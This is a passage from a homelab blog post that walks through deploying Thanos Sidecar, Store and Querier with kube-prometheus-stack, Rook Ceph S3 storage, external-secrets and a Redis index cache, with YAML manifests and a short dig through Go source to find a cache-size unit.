         alt="A diagram showing how Thanos works. On the left side are a couple of squares labeled Kubernetes, Ceph, hosts representing the targets Prometheus, represented by another square, scrapes. The Kubernetes, Ceph, hosts and Prometheus boxes are white. Prometheus, in turn, is connected with an arrow labeled &#39;Gathers Blocks From&#39; to a block called &#39;Thanos Sidecar&#39;. This sidecar then has another arrow indicating that it uploads blocks to S3. A separate square labeled &#39;Thanos Compactor&#39; is only connected to S3, with an arrow labeled &#39;Compact Blocks&#39;. Then there&#39;s the &#39;Thanos Querier&#39; block, connected with arrows labeled &#39;queries&#39; to the &#39;Thanos Sidecar&#39; and &#39;S3&#39;. And finally, another block in white labeled &#39;Grafana&#39; has an arrow towards the &#39;Thanos Querier&#39; labeled &#39;queries&#39;."/> <figcaption>
            <p>Overview of Thanos</p>
        </figcaption>
</figure>
</p>
<p>The components marked in white in the diagram are the original components of my
metrics setup, while the new Thanos components are kept in blue. Thanos starts
out taking the uncompressed blocks from Prometheus&rsquo; storage via the <a href="https://thanos.io/tip/components/sidecar.md/">Thanos Sidecar</a>,
uploading them unchanged to S3. Once the blocks are uploaded, they are downloaded
again by the <a href="https://thanos.io/tip/components/compact.md/">Compactor</a>, who&rsquo;s main job is to compact the blocks, similar to what
Prometheus would do.</p>
<p>Queries against this storage are done by the <a href="https://thanos.io/tip/components/query.md/">Querier</a>. It is not only connected
to the S3 bucket and able to query the blocks there via range requests, but also
to the Sidecar. This is necessary because Prometheus (by default) only creates a
new actual block every two hours. Before that, newly scraped metrics are kept in
the head block. So to get the most recent data, the Querier needs to got to the
Sidecar. For queries over longer intervals, the Querier is able to combine data
from multiple sources.</p>
<p>And finally, Grafana is no longer pointed at Prometheus, but instead at the
Thanos Querier. There&rsquo;s also an additional component, the <a href="https://thanos.io/tip/components/query-frontend.md/">Thanos Query Frontend</a>,
that does query distribution and caching. But to be honest, it doesn&rsquo;t look like
I need it right now.</p>
<h2 id="thanos-setup">Thanos setup</h2>
<p>The first step to complete was setting up an S3 bucket, which I did via my
Rook Ceph cluster:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">objectbucket.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ObjectBucketClaim</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bucket-thanos</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">bucketName</span>: {{ <span style="color:#ae81ff">.Values.bucketName }}</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storageClassName</span>: <span style="color:#ae81ff">rgw-bulk</span>
</span></span></code></pre></div><p>Next step is the setup of the Sidecar. As I&rsquo;m running <a href="https://github.com/prometheus-community/helm-charts/tree/main/charts/kube-prometheus-stack">kube-prometheus-stack</a>
for my monitoring stack and that already provides Thanos integration, I used that.
There are a number of changes necessary in the Prometheus part of the <code>values.yaml</code>
file. First, <code>prometheus.prometheusSpec.disableCompaction: true</code> needs to be set.
That completely removes Prometheus&rsquo; own compaction, which is necessary so Thanos
can take over compaction duties. Then I also set some Thanos related options:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">prometheus</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">thanosService</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">thanosServiceMonitor</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">thanosServiceExternal</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">thanosIngress</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">prometheusSpec</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">disableCompaction</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">thanos</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">objectStorageConfig</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">existingSecret</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos-objectstore-config</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;bucket.yml&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">logFormat</span>: <span style="color:#ae81ff">json</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">additionalArgs</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">shipper.upload-compacted</span>
</span></span></code></pre></div><p>I didn&rsquo;t need any ingress to the Sidecar, so I disabled it. As is my habit, I
also disabled Thanos&rsquo; own metric gathering, at least until I could get around to
properly setting it up and creating some dashboards.</p>
<p>The <code>thanos:</code> section provides the configuration for the Sidecar. It&rsquo;s part of
the Prometheus Operator config, so it&rsquo;s not the kube-prometheus-stack which adds
the Thanos Sidecar, but the Prometheus Operator. The content of the <code>prometheusSpec.thanos</code> key is
copied verbatim into the <a href="https://prometheus-operator.dev/docs/api-reference/api/#monitoring.coreos.com/v1.ThanosSpec">thanos section</a>
of the PrometheusSpec for the Prom operator, so any other options from that
section can also be added  here.</p>
<p>The <code>shipper.upload-compacted</code> flag for the Thanos Sidecar is required so that
it uploads already compacted blocks to the S3 bucket. Without this option, the
Sidecar will only ever touch uncompacted blocks. As I wanted to move my entire
metrics history to S3, I enabled the option.</p>
<p>The main problem during the setup, as seems to happen so often, was how to
effectively use the S3 config and credentials so helpfully provided by Rook
in the form of a Secret and a ConfigMap. There are two ways of providing the
bucket config to Thanos, both need a <a href="https://thanos.io/tip/thanos/storage.md/#configuring-access-to-object-storage">Thanos-specific config file</a>, either supplied
as an actual file or by providing the file content as a verbatim string parameter
to a command line flag.</p>
<p>Because the ability to provide environment variables to the Sidecar was completely
missing, I opted again for my external-secrets <a href="https://external-secrets.io/latest/provider/kubernetes/">Kubernetes Store</a>
approach to providing the S3 credentials. For details, see <a href="https://blog.mei-home.net/posts/k8s-migration-11-harbor/#issues-with-secrets">this post</a>.
But external-secrets does not allow taking some values from a ConfigMap for the
template, so while I could provide the credentials from the Secret generated by
Rook, I couldn&rsquo;t use the configs from the ConfigMap it also creates and had to
hardcode them:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1beta1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ExternalSecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos-objectstore-config</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">refreshInterval</span>: <span style="color:#e6db74">&#34;10m&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">secretStoreRef</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">monitoring-secrets-store</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">SecretStore</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">target</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos-objectstore-config</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">bucket.yml</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          type: S3
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          config:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            bucket: thanos
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            endpoint: rook-ceph-rgw-rgw-bulk.example.svc:80
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            disable_dualstack: true
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            aws_sdk_auth: false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            access_key: {{ `{{ .AWS_ACCESS_KEY_ID }}` }}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            secret_key: {{ `{{ .AWS_SECRET_ACCESS_KEY }}` }}
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            insecure: true
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            bucket_lookup_type: path</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dataFrom</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">extract</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">bucket-thanos</span>
</span></span></code></pre></div><p>Once I deployed this configuration, the Sidecar immediately started uploading
the older, already compacted blocks. For the about 250 GB worth of metrics data
I had at that point, it took about 4.5h to upload everything.</p>
<p>Next, the deployment of the other Thanos components. I decided to deploy them
into my <code>monitoring</code> namespace, similar to kube-prometheus-stack, because it
allowed me to share the configs and Secret between the Sidecar and the other
components.</p>
<p>The first Thanos standalone component I deployed was the Thanos Store. It serves
as a backend for the Querier, downloading and supplying blocks from the S3 bucket.</p>
<p>Before deploying the Store, I had to define a <a href="https://thanos.io/tip/components/store.md/#index-cache">cache config</a>.
This particular cache is for the indexes of Prometheus blocks. I decided on using
Redis for this, as I&rsquo;ve already got an instance running anyway. My configuration
looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ConfigMap</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">redis-cache-conf</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">redis-cache.yaml</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    type: REDIS
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    config:
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      addr: redis.redis.svc.cluster.local:6379
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      tls_enabled: false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      cache_size: 256MB
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      max_async_buffer_size: 100000</span>
</span></span></code></pre></div><p>One really annoying thing: The unit of the <code>cache_size</code> doesn&rsquo;t seem to be
documented anywhere. So I went spelunking a little bit. First, I looked up the
<code>cache_size</code> in the <a href="https://github.com/thanos-io/thanos/blob/2a5a856e34adb2653dda700c4d87637236afb2dd/pkg/cacheutil/redis_client.go#L212">Thanos repo</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-golang" data-lang="golang"><span style="display:flex;"><span>	<span style="color:#a6e22e">clientOpts</span> <span style="color:#f92672">:=</span> <span style="color:#a6e22e">rueidis</span>.<span style="color:#a6e22e">ClientOption</span>{
</span></span><span style="display:flex;"><span>		<span style="color:#a6e22e">InitAddress</span>:       <span style="color:#a6e22e">strings</span>.<span style="color:#a6e22e">Split</span>(<span style="color:#a6e22e">config</span>.<span style="color:#a6e22e">Addr</span>, <span style="color:#e6db74">&#34;,&#34;</span>),
</span></span><span style="display:flex;"><span>		<span style="color:#a6e22e">ShuffleInit</span>:       <span style="color:#66d9ef">true</span>,
</span></span><span style="display:flex;"><span>		<span style="color:#a6e22e">Username</span>:          <span style="color:#a6e22e">config</span>.<span style="color:#a6e22e">Username</span>,
</span></span><span style="display:flex;"><span>		<span style="color:#a6e22e">Password</span>:          <span style="color:#a6e22e">config</span>.<span style="color:#a6e22e">Password</span>,
</span></span><span style="display:flex;"><span>		<span style="color:#a6e22e">SelectDB</span>:          <span style="color:#a6e22e">config</span>.<span style="color:#a6e22e">DB</span>,
</span></span><span style="display:flex;"><span>		<span style="color:#a6e22e">CacheSizeEachConn</span>: int(<span style="color:#a6e22e">config</span>.<span style="color:#a6e22e">CacheSize</span>),
</span></span><span style="display:flex;"><span>		<span style="color:#a6e22e">Dialer</span>:            <span style="color:#a6e22e">net</span>.<span style="color:#a6e22e">Dialer</span>{<span style="color:#a6e22e">Timeout</span>: <span style="color:#a6e22e">config</span>.<span style="color:#a6e22e">DialTimeout</span>},
</span></span><span style="display:flex;"><span>		<span style="color:#a6e22e">ConnWriteTimeout</span>:  <span style="color:#a6e22e">config</span>.<span style="color:#a6e22e">WriteTimeout</span>,
</span></span><span style="display:flex;"><span>		<span style="color:#a6e22e">DisableCache</span>:      <span style="color:#a6e22e">clientSideCacheDisabled</span>,
</span></span><span style="display:flex;"><span>		<span style="color:#a6e22e">TLSConfig</span>:         <span style="color:#a6e22e">tlsConfig</span>,
</span></span><span style="display:flex;"><span>	}
</span></span></code></pre></div><p>Through the <code>rueidis</code> in the package name of that struct, I landed on the repo
of the <a href="https://github.com/redis/rueidis/blob/84ae736a8812099d841cd68e4b6b502de08c7a37/cache.go#L15">Redis Go client</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-golang" data-lang="golang"><span style="display:flex;"><span><span style="color:#75715e">// CacheStoreOption will be passed to NewCacheStoreFn</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">type</span> <span style="color:#a6e22e">CacheStoreOption</span> <span style="color:#66d9ef">struct</span> {
</span></span><span style="display:flex;"><span>	<span style="color:#75715e">// CacheSizeEachConn is redis client side cache size that bind to each TCP connection to a single redis instance.</span>
</span></span><span style="display:flex;"><span>	<span style="color:#75715e">// The default is DefaultCacheBytes.</span>
</span></span><span style="display:flex;"><span>	<span style="color:#a6e22e">CacheSizeEachConn</span> <span style="color:#66d9ef">int</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>And then I finally found the default value and figured out what the unit was
<a href="https://github.com/redis/rueidis/blob/84ae736a8812099d841cd68e4b6b502de08c7a37/rueidis.go#L21">here</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-golang" data-lang="golang"><span style="display:flex;"><span><span style="color:#66d9ef">const</span> (
</span></span><span style="display:flex;"><span>	<span style="color:#75715e">// DefaultCacheBytes is the default value of ClientOption.CacheSizeEachConn, which is 128 MiB</span>
</span></span><span style="display:flex;"><span>	<span style="color:#a6e22e">DefaultCacheBytes</span> = <span style="color:#ae81ff">128</span> <span style="color:#f92672">*</span> (<span style="color:#ae81ff">1</span> <span style="color:#f92672">&lt;&lt;</span> <span style="color:#ae81ff">20</span>)
</span></span></code></pre></div><p>And all of that sleuthing just to realize that the value takes any unit I want.
&#x1f926;</p>
<p>Ah well. At least I got to look at some Go code again. All of that said, the
Store also needs a bit of local disk space, as a scratch space for temporarily
downloading chunks or indexes. I gave it a 5 GiB volume, and that has been more
than enough the last couple of weeks since I&rsquo;ve had the setup running.</p>
<p>The deployment of the store then looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos-store</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">thanos-store</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#e6db74">&#34;Recreate&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">thanos-store</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">checksum/redis-conf</span>: {{ <span style="color:#ae81ff">include (print $.Template.BasePath &#34;/redis-cache-config.yaml&#34;) . | sha256sum }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">automountServiceAccountToken</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">fsGroup</span>: <span style="color:#ae81ff">1000</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos-store</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">quay.io/thanos/thanos:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#ae81ff">store</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">cache-index-header</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">chunk-pool-size=1GB</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">data-dir={{ .Values.store.cacheDir }}</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">index-cache.config-file=/homelab/thanos-store/configs/redis-cache.yaml</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">log.format={{ .Values.logFormat }}</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">log.level={{ .Values.logLevel }}</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">objstore.config-file=/homelab/thanos-store/configs/bucket-config.yml</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">web.disable</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">grpc-address=0.0.0.0:{{ .Values.ports.grpcPort }}</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">http-address=0.0.0.0:{{ .Values.ports.httpPort }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cache</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: {{ <span style="color:#ae81ff">.Values.store.cacheDir }}</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos-configs</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/homelab/thanos-store/configs</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">200m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">1500Mi</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">limits</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">1500Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">livenessProbe</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">failureThreshold</span>: <span style="color:#ae81ff">8</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">httpGet</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/-/healthy</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.ports.httpPort }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">scheme</span>: <span style="color:#ae81ff">HTTP</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">periodSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">timeoutSeconds</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">readinessProbe</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">failureThreshold</span>: <span style="color:#ae81ff">20</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">httpGet</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/-/ready</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.ports.httpPort }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">scheme</span>: <span style="color:#ae81ff">HTTP</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">periodSeconds</span>: <span style="color:#ae81ff">5</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">store-http</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.httpPort }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">store-grpc</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.grpcPort }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cache</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">persistentVolumeClaim</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">claimName</span>: <span style="color:#ae81ff">thanos-store-volume</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos-configs</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">projected</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">sources</span>:
</span></span><span style="display:flex;"><span>              - <span style="color:#f92672">secret</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos-objectstore-config</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">items</span>:
</span></span><span style="display:flex;"><span>                    - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;bucket.yml&#34;</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">path</span>: <span style="color:#ae81ff">bucket-config.yml</span>
</span></span><span style="display:flex;"><span>              - <span style="color:#f92672">configMap</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">redis-cache-conf</span>
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">items</span>:
</span></span><span style="display:flex;"><span>                    - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;redis-cache.yaml&#34;</span>
</span></span><span style="display:flex;"><span>                      <span style="color:#f92672">path</span>: <span style="color:#ae81ff">redis-cache.yaml</span>
</span></span></code></pre></div><p>Nothing special to see here, so let&rsquo;s move on to the next piece of the puzzle.
At this point, the upload of the older blocks was done, so I went into the config
and removed the <code>shipper.upload-compacted</code> flag from the <code>additionalArgs</code> of the
Thanos Sidecar config. I still left my 5 year retention in Prometheus for now,
because I hadn&rsquo;t tested anything related to Thanos yet.</p>
<p>That&rsquo;s coming now, with the deployment of the Querier. That&rsquo;s the component that
goes to a number of metrics stores, which can be Thanos Store instances, or
Thanos Sidecars on multiple Prometheus instances and queries them for data. It
implements the Prometheus query language, so it&rsquo;s fully compatible with frontends
like Grafana.</p>
<p>It&rsquo;s also not very complicated, as it doesn&rsquo;t need any local storage for example:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos-querier</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">thanos-querier</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#e6db74">&#34;Recreate&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">thanos-querier</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">automountServiceAccountToken</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">fsGroup</span>: <span style="color:#ae81ff">1000</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">thanos-querier</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">quay.io/thanos/thanos:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#ae81ff">query</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">query.auto-downsampling</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">log.format={{ .Values.logFormat }}</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">log.level={{ .Values.logLevel }}</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">grpc-address=0.0.0.0:{{ .Values.ports.grpcPort }}</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">http-address=0.0.0.0:{{ .Values.ports.httpPort }}</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">endpoint=dnssrv+_thanos-store-grpc._tcp.thanos-store.monitoring.svc</span>
</span></span><span style="display:flex;"><span>            - --<span style="color:#ae81ff">endpoint=dnssrv+_grpc._tcp.monitoring-kube-prometheus-thanos-discovery.monitoring.svc</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
